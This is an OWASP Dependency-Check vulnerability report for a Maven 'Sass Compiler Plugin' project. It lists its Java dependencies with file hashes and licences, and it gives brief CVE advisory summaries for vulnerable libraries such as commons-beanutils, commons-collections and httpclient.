Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.

Project: Sass Compiler Plugin

Scan Information:

Display: Showing Vulnerable Dependencies

Dependency CPE GAV Highest Severity CVE Count CPE Confidence Evidence Count
antlr-2.7.2.jar antlr:antlr:2.7.2   0 10
aopalliance-1.0.jar aopalliance:aopalliance:1.0   0 12
backport-util-concurrent-3.1.jar backport-util-concurrent:backport-util-concurrent:3.1   0 15
classworlds-1.1-alpha-2.jar classworlds:classworlds:1.1-alpha-2   0 16
jsr305-2.0.1.jar com.google.code.findbugs:jsr305:1.3.7   0 18
guava-18.0.jar com.google.guava:guava:18.0   0 18
guice-4.0-no_aop.jar com.google.inject:guice:4.0   0 19
commons-beanutils-1.8.3.jar cpe:/a:apache:commons_beanutils:1.8.3 commons-beanutils:commons-beanutils:1.8.3 High 1 LOW 24
commons-chain-1.1.jar commons-chain:commons-chain:1.1   0 18
commons-codec-1.3.jar commons-codec:commons-codec:1.3   0 19
commons-collections-3.2.1.jar cpe:/a:apache:commons_collections:3.2.1 commons-collections:commons-collections:3.2.1 High 1 HIGHEST 24
commons-digester-1.8.1.jar commons-digester:commons-digester:1.8.1   0 24
commons-io-2.5.jar commons-io:commons-io:2.5   0 27
commons-lang-2.4.jar commons-lang:commons-lang:2.4   0 24
commons-logging-1.2.jar commons-logging:commons-logging:1.2   0 25
commons-validator-1.4.1.jar commons-validator:commons-validator:1.4.1   0 26
dom4j-1.1.jar dom4j:dom4j:1.1   0 14
jsr250-api-1.0.jar javax.annotation:jsr250-api:1.0   0 12
cdi-api-1.0.jar javax.enterprise:cdi-api:1.0   0 18
javax.inject-1.jar javax.inject:javax.inject:1   0 12
commons-lang3-3.4.jar org.apache.commons:commons-lang3:3.4   0 27
httpclient-4.0.2.jar cpe:/a:apache:httpclient:4.0.2 org.apache.httpcomponents:httpclient:4.0.2 Medium 2 LOW 20
httpcore-4.0.1.jar org.apache.httpcomponents:httpcore:4.0.1   0 18
doxia-core-1.6.jar org.apache.maven.doxia:doxia-core:1.6   0 19
doxia-decoration-model-1.6.jar org.apache.maven.doxia:doxia-decoration-model:1.6   0 19
doxia-logging-api-1.7.jar org.apache.maven.doxia:doxia-logging-api:1.7   0 19
doxia-module-fml-1.6.jar org.apache.maven.doxia:doxia-module-fml:1.6   0 19
doxia-module-xhtml-1.6.jar org.apache.maven.doxia:doxia-module-xhtml:1.6   0 19
doxia-sink-api-1.7.jar org.apache.maven.doxia:doxia-sink-api:1.7   0 19
doxia-site-renderer-1.6.jar org.apache.maven.doxia:doxia-site-renderer:1.6   0 19
maven-aether-provider-3.3.9.jar org.apache.maven:maven-aether-provider:3.3.9   0 19
maven-artifact-manager-2.2.1.jar org.apache.maven:maven-artifact-manager:2.2.1   0 18
maven-artifact-3.3.9.jar org.apache.maven:maven-artifact:3.3.9   0 18
maven-builder-support-3.3.9.jar org.apache.maven:maven-builder-support:3.3.9   0 19
maven-core-3.3.9.jar cpe:/a:apache:maven:3.3.9 org.apache.maven:maven-core:3.3.9   0 LOW 19
maven-model-builder-3.3.9.jar org.apache.maven:maven-model-builder:3.3.9   0 19
maven-model-3.3.9.jar org.apache.maven:maven-model:3.3.9   0 19
maven-plugin-api-3.3.9.jar org.apache.maven:maven-plugin-api:3.3.9   0 19
maven-plugin-registry-2.2.1.jar org.apache.maven:maven-plugin-registry:2.2.1   0 18
maven-profile-2.2.1.jar org.apache.maven:maven-profile:2.2.1   0 18
maven-project-2.2.1.jar org.apache.maven:maven-project:2.2.1   0 19
maven-repository-metadata-3.3.9.jar org.apache.maven:maven-repository-metadata:3.3.9   0 19
maven-settings-builder-3.3.9.jar org.apache.maven:maven-settings-builder:3.3.9   0 19
maven-settings-3.3.9.jar org.apache.maven:maven-settings:3.3.9   0 19
maven-plugin-annotations-3.4.jar org.apache.maven.plugin-tools:maven-plugin-annotations:3.4   0 19
maven-reporting-api-3.0.jar org.apache.maven.reporting:maven-reporting-api:3.0   0 20
maven-reporting-impl-2.4.jar org.apache.maven.reporting:maven-reporting-impl:2.4   0 20
maven-shared-utils-0.8.jar org.apache.maven.shared:maven-shared-utils:0.8   0 18
maven-shared-utils-0.8.jar/META-INF/maven/commons-io/commons-io/pom.xml commons-io:commons-io:2.2   0 8
wagon-provider-api-2.10.jar org.apache.maven.wagon:wagon-provider-api:2.10   0 19
struts-core-1.3.8.jar cpe:/a:apache:struts:1.3.8 org.apache.struts:struts-core:1.3.8 High 1 HIGHEST 18
struts-taglib-1.3.8.jar cpe:/a:apache:struts:1.3.8 org.apache.struts:struts-taglib:1.3.8 High 1 HIGHEST 18
struts-tiles-1.3.8.jar cpe:/a:apache:struts:1.3.8 cpe:/a:apache:tiles:1.3.8 org.apache.struts:struts-tiles:1.3.8 High 1 HIGHEST 18
velocity-tools-2.0.jar org.apache.velocity:velocity-tools:2.0   0 19
velocity-1.5.jar org.apache.velocity:velocity:1.5   0 20
plexus-classworlds-2.5.2.jar org.codehaus.plexus:plexus-classworlds:2.5.2   0 19
plexus-component-annotations-1.6.jar org.codehaus.plexus:plexus-component-annotations:1.6   0 17
plexus-container-default-1.0-alpha-9-stable-1.jar org.codehaus.plexus:plexus-container-default:1.0-alpha-9-stable-1   0 16
plexus-i18n-1.0-beta-7.jar org.codehaus.plexus:plexus-i18n:1.0-beta-7   0 16
plexus-interpolation-1.21.jar org.codehaus.plexus:plexus-interpolation:1.21   0 16
plexus-utils-3.0.22.jar org.codehaus.plexus:plexus-utils:3.0.22   0 17
plexus-velocity-1.1.7.jar org.codehaus.plexus:plexus-velocity:1.1.7   0 16
aether-api-1.0.2.v20150114.jar org.eclipse.aether:aether-api:1.0.2.v20150114   0 19
aether-impl-1.0.2.v20150114.jar org.eclipse.aether:aether-impl:1.0.2.v20150114   0 19
aether-spi-1.0.2.v20150114.jar cpe:/a:eclipse:eclipse_ide:1.0.2.v20150114 org.eclipse.aether:aether-spi:1.0.2.v20150114 Medium 2 LOW 19
aether-util-1.0.2.v20150114.jar org.eclipse.aether:aether-util:1.0.2.v20150114   0 19
org.eclipse.sisu.inject-0.3.2.jar org.eclipse.sisu:org.eclipse.sisu.inject:0.3.2   0 19
org.eclipse.sisu.plexus-0.3.2.jar org.eclipse.sisu:org.eclipse.sisu.plexus:0.3.2   0 19
jruby-complete-9.1.2.0.jar cpe:/a:jruby:jruby:9.1.2.0 org.jruby:jruby-complete:9.1.2.0 Medium 1 LOW 14
jruby-complete-9.1.2.0.jar: jffi-1.2.dll   0 2
jruby-complete-9.1.2.0.jar: jffi-1.2.dll   0 2
jruby-complete-9.1.2.0.jar: jrubyw.exe   0 1
jruby-complete-9.1.2.0.jar: jar-dependencies-0.3.2.gemspec   0 9
jruby-complete-9.1.2.0.jar: jruby-openssl-0.9.15-java.gemspec cpe:/a:jruby:jruby:0.9.15 cpe:/a:openssl:openssl:0.9.15 High 78 LOW 9
jruby-complete-9.1.2.0.jar: json-1.8.3-java.gemspec cpe:/a:jruby:jruby:1.8.3 Medium 1 LOW 9
jruby-complete-9.1.2.0.jar: minitest-5.4.1.gemspec   0 9
jruby-complete-9.1.2.0.jar: net-telnet-0.1.1.gemspec   0 9
jruby-complete-9.1.2.0.jar: power_assert-0.2.3.gemspec   0 9
jruby-complete-9.1.2.0.jar: psych-2.0.17-java.gemspec   0 9
jruby-complete-9.1.2.0.jar: racc-1.4.13-java.gemspec   0 9
jruby-complete-9.1.2.0.jar: rake-10.4.2.gemspec   0 9
jruby-complete-9.1.2.0.jar: rdoc-4.2.0.gemspec cpe:/a:dave_thomas:rdoc:4.2.0   0 LOW 9
jruby-complete-9.1.2.0.jar: test-unit-3.1.1.gemspec   0 9
jruby-complete-9.1.2.0.jar: Rakefile   0 1
jruby-complete-9.1.2.0.jar: jline-2.11.jar jline:jline:2.11   0 13
jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll   0 1
jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll   0 1
jruby-complete-9.1.2.0.jar: joda-time-2.3.jar joda-time:joda-time:2.3   0 22
jruby-complete-9.1.2.0.jar: jopenssl.jar cpe:/a:jruby:jruby:0.9.15 cpe:/a:openssl:openssl:0.9.15 rubygems:jruby-openssl:0.9.15 High 78 LOW 9
jruby-complete-9.1.2.0.jar: generator.jar   0 3
jruby-complete-9.1.2.0.jar: parser.jar   0 3
jruby-complete-9.1.2.0.jar: bcpkix-jdk15on-1.54.jar org.bouncycastle:bcpkix-jdk15on:1.54   0 26
jruby-complete-9.1.2.0.jar: bcprov-jdk15on-1.54.jar cpe:/a:bouncycastle:bouncy-castle-crypto-package:1.54 cpe:/a:bouncycastle:bouncy_castle_crypto_package:1.54 org.bouncycastle:bcprov-jdk15on:1.54   0 LOW 26
jruby-complete-9.1.2.0.jar: snakeyaml-1.14.jar org.yaml:snakeyaml:1.14   0 17
jruby-complete-9.1.2.0.jar: psych.jar   0 4
jruby-complete-9.1.2.0.jar: cparse-jruby.jar cpe:/a:jruby:jruby:- High 3 LOW 3
jruby-complete-9.1.2.0.jar: readline.jar cpe:/a:jruby:jruby:1.0 rubygems:jruby-readline:1.0 High 3 HIGHEST 12
jruby-complete-9.1.2.0.jar: pr-zlib.gemspec   0 8
jruby-complete-9.1.2.0.jar: Rakefile   0 1
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jffi/pom.xml com.github.jnr:jffi:1.2.12   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-constants/pom.xml com.github.jnr:jnr-constants:0.9.2   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-enxio/pom.xml com.github.jnr:jnr-enxio:0.12   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-ffi/pom.xml com.github.jnr:jnr-ffi:2.0.9   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-netdb/pom.xml com.github.jnr:jnr-netdb:1.1.5   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-posix/pom.xml com.github.jnr:jnr-posix:3.0.29   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-unixsocket/pom.xml com.github.jnr:jnr-unixsocket:0.12   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-x86asm/pom.xml com.github.jnr:jnr-x86asm:1.0.2   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/invokebinder/pom.xml com.headius:invokebinder:1.7   0 4
jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/options/pom.xml com.headius:options:1.4   0 4
jruby-complete-9.1.2.0.jar/META-INF/maven/com.jcraft/jzlib/pom.xml cpe:/a:jcraft:jzlib:1.1.3 com.jcraft:jzlib:1.1.3   0 LOW 6
jruby-complete-9.1.2.0.jar/META-INF/maven/com.martiansoftware/nailgun-server/pom.xml com.martiansoftware:nailgun-server:0.9.1   0 7
jruby-complete-9.1.2.0.jar/META-INF/maven/joda-time/joda-time/pom.xml joda-time:joda-time:2.8.2   0 6
jruby-complete-9.1.2.0.jar/META-INF/maven/org.jruby.joni/joni/pom.xml org.jruby.joni:joni:2.1.10   0 5
plexus-cipher-1.4.jar org.sonatype.plexus:plexus-cipher:1.4   0 17
plexus-sec-dispatcher-1.3.jar org.sonatype.plexus:plexus-sec-dispatcher:1.3   0 17
oro-2.0.8.jar oro:oro:2.0.8   0 12
sslext-1.2-0.jar cpe:/a:apache:struts:1.2.0 sslext:sslext:1.2-0 High 3 LOW 12
xmlunit-1.5.jar xmlunit:xmlunit:1.5   0 12

Dependencies

antlr-2.7.2.jar

File Path: /var/tmp/maven-repo/antlr/antlr/2.7.2/antlr-2.7.2.jar
MD5: a73459120df5cadf75eaa98453433a01
SHA1: 546b5220622c4d9b2da45ad1899224b6ce1c8830
Referenced In Project: Sass Compiler Plugin

Identifiers

aopalliance-1.0.jar

Description: AOP Alliance

License:

Public Domain
File Path: /var/tmp/maven-repo/aopalliance/aopalliance/1.0/aopalliance-1.0.jar
MD5: 04177054e180d09e3998808efa0401c7
SHA1: 0235ba8b489512805ac13a8f9ea77a1ca5ebe3e8
Referenced In Project: Sass Compiler Plugin

Identifiers

backport-util-concurrent-3.1.jar

Description: Dawid Kurzyniec's backport of JSR 166

License:

Public Domain: http://creativecommons.org/licenses/publicdomain
File Path: /var/tmp/maven-repo/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.jar
MD5: 748bb0cbf4780b2e3121dc9c12e10cd9
SHA1: 682f7ac17fed79e92f8e87d8455192b63376347b
Referenced In Project: Sass Compiler Plugin

Identifiers

classworlds-1.1-alpha-2.jar

File Path: /var/tmp/maven-repo/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.jar
MD5: 82cacb7d9724c4a4e4d20f004884d4da
SHA1: 05adf2e681c57d7f48038b602f3ca2254ee82d47
Referenced In Project: Sass Compiler Plugin

Identifiers

jsr305-2.0.1.jar

Description: JSR305 Annotations for Findbugs

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.jar
MD5: 144c0767e2aaf0c21a935908d0e52c68
SHA1: 516c03b21d50a644d538de0f0369c620989cd8f0
Referenced In Project: Sass Compiler Plugin

Identifiers

guava-18.0.jar

Description:  Guava is a suite of core and expanded libraries that include utility classes, google's collections, io classes, and much much more. Guava has only one code dependency - javax.annotation, per the JSR-305 spec.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/com/google/guava/guava/18.0/guava-18.0.jar
MD5: 947641f6bb535b1d942d1bc387c45290
SHA1: cce0823396aa693798f8882e64213b1772032b09
Referenced In Project: Sass Compiler Plugin

Identifiers

guice-4.0-no_aop.jar

Description: Guice is a lightweight dependency injection framework for Java 6 and above

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/com/google/inject/guice/4.0/guice-4.0-no_aop.jar
MD5: 64ff538a6b272442aa00a5d0707ca1d9
SHA1: 199b7acaa05b570bbccf31be998f013963e5e752
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-beanutils-1.8.3.jar

Description: BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
MD5: b45be74134796c89db7126083129532f
SHA1: 686ef3410bcf4ab8ce7fd0b899e832aaba5facf7
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions:

commons-chain-1.1.jar

Description: An implementation of the GoF Chain of Responsibility pattern

License:

The Apache Software License, Version 2.0: /LICENSE.txt
File Path: /var/tmp/maven-repo/commons-chain/commons-chain/1.1/commons-chain-1.1.jar
MD5: d4ce482153073855e7c6453dc3c725cb
SHA1: 3038bd41dcdb2b63b8c6dcc8c15f0fdf3f389012
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-codec-1.3.jar

Description: The codec package contains simple encoder and decoders for various formats such as Base64 and Hexadecimal. In addition to these widely used encoders and decoders, the codec package also maintains a collection of phonetic encoding utilities.

License:

The Apache Software License, Version 2.0: /LICENSE.txt
File Path: /var/tmp/maven-repo/commons-codec/commons-codec/1.3/commons-codec-1.3.jar
MD5: 8e149c1053741c03736a52df83974dcc
SHA1: fd32786786e2adb664d5ecc965da47629dca14ba
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-collections-3.2.1.jar

Description: Types that extend and augment the Java Collections Framework.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
MD5: 13bc641afd7fd95e09b260f69c1e4c91
SHA1: 761ea405b9b37ced573d2df0d1e3a4e0f9edc668
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2015-6420

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.

Vulnerable Software & Versions:

commons-digester-1.8.1.jar

Description:  The Digester package lets you configure an XML to Java object mapping module which triggers certain actions called rules whenever a particular pattern of nested XML elements is recognized.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-digester/commons-digester/1.8.1/commons-digester-1.8.1.jar
MD5: 5002ecf033f5a79e398155823badb36a
SHA1: 3dec9b9c7ea9342d4dbe8c38560080d85b44a015
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-io-2.5.jar

Description:  The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-io/commons-io/2.5/commons-io-2.5.jar
MD5: e2d74794fba570ec2115fb9d5b05dc9b
SHA1: 2852e6e05fbb95076fc091f6d1780f1f8fe35e0f
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-lang-2.4.jar

Description:  Commons Lang, a package of Java utility classes for the classes that are in java.lang's hierarchy, or are considered to be so standard as to justify existence in java.lang.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-lang/commons-lang/2.4/commons-lang-2.4.jar
MD5: 237a8e845441bad2e535c57d985c8204
SHA1: 16313e02a793435009f1e458fa4af5d879f6fb11
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-logging-1.2.jar

Description: Apache Commons Logging is a thin adapter allowing configurable bridging to other, well known logging systems.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
MD5: 040b4b4d8eac886f6b4a2a3bd2f31b00
SHA1: 4bfc12adfe4842bf07b657f0369c4cb522955686
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-validator-1.4.1.jar

Description:  Apache Commons Validator provides the building blocks for both client side validation and server side data validation. It may be used standalone or with a framework like Struts.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-validator/commons-validator/1.4.1/commons-validator-1.4.1.jar
MD5: 4b20b04c1f967af1a115fdefcbe70109
SHA1: 2231238e391057a53f92bde5bbc588622c1956c3
Referenced In Project: Sass Compiler Plugin

Identifiers

dom4j-1.1.jar

File Path: /var/tmp/maven-repo/dom4j/dom4j/1.1/dom4j-1.1.jar
MD5: f1c39d0d2b2c6f5ffb0046841a34b5c9
SHA1: 0690b3108a502c8f033ea87e7278aec309ffa668
Referenced In Project: Sass Compiler Plugin

Identifiers

jsr250-api-1.0.jar

Description: JSR-250 Reference Implementation by Glassfish

License:

COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /var/tmp/maven-repo/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar
MD5: 4cd56b2e4977e541186de69f5126b4a6
SHA1: 5025422767732a1ab45d93abfea846513d742dcf
Referenced In Project: Sass Compiler Plugin

Identifiers

cdi-api-1.0.jar

Description: APIs for JSR-299: Contexts and Dependency Injection for Java EE

File Path: /var/tmp/maven-repo/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar
MD5: 462c0959f0322016495f4598243bc0f2
SHA1: 44c453f60909dfc223552ace63e05c694215156b
Referenced In Project: Sass Compiler Plugin

Identifiers

javax.inject-1.jar

Description: The javax.inject API

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/javax/inject/javax.inject/1/javax.inject-1.jar
MD5: 289075e48b909e9e74e6c915b3631d2e
SHA1: 6975da39a7040257bd51d21a231b76c915872d38
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-lang3-3.4.jar

Description:  Apache Commons Lang, a package of Java utility classes for the classes that are in java.lang's hierarchy, or are considered to be so standard as to justify existence in java.lang.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar
MD5: 8667a442ee77e509fbe8176b94726eb2
SHA1: 5fe28b9518e58819180a43a850fbc0dd24b7c050
Referenced In Project: Sass Compiler Plugin

Identifiers

httpclient-4.0.2.jar

Description:  HttpComponents Client (base module)

License:

Apache License: ../LICENSE.txt
File Path: /var/tmp/maven-repo/org/apache/httpcomponents/httpclient/4.0.2/httpclient-4.0.2.jar
MD5: d685d72de1a8305bd84c5d6b002214b7
SHA1: 781b68c2fd5335de914166241b8d4bfe8c2f91b7
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2015-5262

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2014-3577

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)

org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a "CN=" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the "foo,CN=www.apache.org" string in the O field.

Vulnerable Software & Versions:

httpcore-4.0.1.jar

Description:  HttpComponents Core (Java 1.3 compatible)

License:

Apache License: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /var/tmp/maven-repo/org/apache/httpcomponents/httpcore/4.0.1/httpcore-4.0.1.jar
MD5: 6c1963fd8ac0c40c004c9e892e0d7703
SHA1: e813b8722c387b22e1adccf7914729db09bcb4a9
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-core-1.6.jar

Description: Doxia core classes and interfaces.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-core/1.6/doxia-core-1.6.jar
MD5: b6de6f089320d64d2520e61ebdb0202b
SHA1: 61dd1084ec7d093086db714537439b02c76f0deb
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-decoration-model-1.6.jar

Description: The Decoration Model handles the decoration descriptor for sites, also known as site.xml.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-decoration-model/1.6/doxia-decoration-model-1.6.jar
MD5: ee947d775ed462ae4405e1b091b75c97
SHA1: 5143fc30d9b6e6b8636212b5caf4139f1b68ad2f
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-logging-api-1.7.jar

Description: Doxia Logging API.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-logging-api/1.7/doxia-logging-api-1.7.jar
MD5: 685d0eddaa6c6e6828863b985f25d7cf
SHA1: 026b1ace473b018f4b0053f7d525ddd1cfb777df
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-module-fml-1.6.jar

Description:  A Doxia module for FML source documents. FML format is only supported as source format.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-module-fml/1.6/doxia-module-fml-1.6.jar
MD5: 8ee4f701bebf5ae903258753daf007e1
SHA1: 67e3faa49307e003ba717eb53330aeb02861de19
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-module-xhtml-1.6.jar

Description:  A Doxia module for Xhtml source documents. Xhtml format is supported both as source and target formats.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-module-xhtml/1.6/doxia-module-xhtml-1.6.jar
MD5: 7a6ac991e2fa35a6d9af5f75f975fe55
SHA1: 71dc8d1ce4c5fcd976aecb8339e331ba9f46f7e3
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-sink-api-1.7.jar

Description: Doxia Sink API.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-sink-api/1.7/doxia-sink-api-1.7.jar
MD5: 77ed4a3d25c0e5c8c8908880868b2fc4
SHA1: 64482f540f8f45c0749b2febdb78ee3148a52b58
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-site-renderer-1.6.jar

Description: The Site Renderer handles the rendering of sites, merging site decoration with document content.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-site-renderer/1.6/doxia-site-renderer-1.6.jar
MD5: 3e973ac502710a58a7f05db3676854e6
SHA1: 99ca276310172f91700577383730090c285c5126
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-aether-provider-3.3.9.jar

Description: Extensions to Aether for utilizing Maven POM and repository metadata.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-aether-provider/3.3.9/maven-aether-provider-3.3.9.jar
MD5: a59398f1c07cdb0acb7241c912277727
SHA1: 29e8e7122f7a166ea53785cd75af0ef9d4d848d4
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-artifact-manager-2.2.1.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.jar
MD5: f3e76a8a83f422a900886543c48914f7
SHA1: ec355b913c34d37080810f98e3f51abecbe1572b
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-artifact-3.3.9.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar
MD5: eabb57cd2980b2776fa4c441307ea60c
SHA1: 0f43afa184555fbc6e36b3334b17246c39b30f6e
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-builder-support-3.3.9.jar

Description: Support for descriptor builders (model, setting, toolchains)

File Path: /var/tmp/maven-repo/org/apache/maven/maven-builder-support/3.3.9/maven-builder-support-3.3.9.jar
MD5: 2e6239035784eaa473c2254906499b73
SHA1: a96f29da7623c0e1db9824f628548fe8181f6dd0
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-core-3.3.9.jar

Description: Maven Core classes.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-core/3.3.9/maven-core-3.3.9.jar
MD5: 26ca8120bcd92b50cd3eeaf72857f10b
SHA1: 47154012330ea639849c618ebc11cff6870e570a
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-model-builder-3.3.9.jar

Description: The effective model builder, with inheritance, profile activation, interpolation, ...

File Path: /var/tmp/maven-repo/org/apache/maven/maven-model-builder/3.3.9/maven-model-builder-3.3.9.jar
MD5: 1f2574146387b9bf42d8c6f474c31dc0
SHA1: e2055f9adb9f3c9a93e6b36fffe79781a785de2d
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-model-3.3.9.jar

Description: Model for Maven POM (Project Object Model)

File Path: /var/tmp/maven-repo/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar
MD5: 7cad05127acd17c06329852e268f92e7
SHA1: 6efde8cbcb4de4c47f7e9c2a3ab2806022b5c70f
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-plugin-api-3.3.9.jar

Description: The API for plugins - Mojos - development.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar
MD5: 2de70681e18aae4f174b0760e4e69281
SHA1: aa706ea7ca23776861b4eb2cea97cf345e791496
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-plugin-registry-2.2.1.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.jar
MD5: 46a27ab81d327e3f5fd1d3e435fe2aad
SHA1: 72a24b7775649af78f3986b5aa7eb354b9674cfd
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-profile-2.2.1.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.jar
MD5: 53dd14e28aaad4bd5dd379dfdbf46a4c
SHA1: 3950071587027e5086e9c395574a60650c432738
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-project-2.2.1.jar

Description: This library is used to not only read Maven project object model files, but to assemble inheritance and to retrieve remote models as required.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.jar
MD5: 8f9382d7c0c120e94c2aaf8bbe817b6f
SHA1: 8239e98c16f641d55a4ad0e0bab0aee3aff8933f
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-repository-metadata-3.3.9.jar

Description: Per-directory local and remote repository metadata.

